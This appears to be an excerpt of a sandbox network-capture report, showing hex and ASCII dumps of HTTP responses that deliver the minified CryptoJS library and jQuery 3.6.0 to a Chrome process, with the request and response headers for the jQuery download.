                                                          2025-01-16 04:17:32 UTC403INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                          Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a
                                                          Data Ascii: !=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Obj
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64
                                                          Data Ascii: .clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.rand
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20
                                                          Data Ascii: ng"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c
                                                          Data Ascii: (){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c
                                                          Data Ascii: >0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69
                                                          Data Ascii: t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stri
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49
                                                          Data Ascii: r o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHI
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61
                                                          Data Ascii: *a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}va
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62
                                                          Data Ascii: 3,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449748151.101.66.1374432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:32 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                          Host: code.jquery.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:32 UTC613INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 89501
                                                          Server: nginx
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                          ETag: "28feccc0-15d9d"
                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Accept-Ranges: bytes
                                                          Age: 2485578
                                                          Date: Thu, 16 Jan 2025 04:17:32 GMT
                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740071-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 2774, 0
                                                          X-Timer: S1737001052.381352,VS0,VE1
                                                          Vary: Accept-Encoding
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
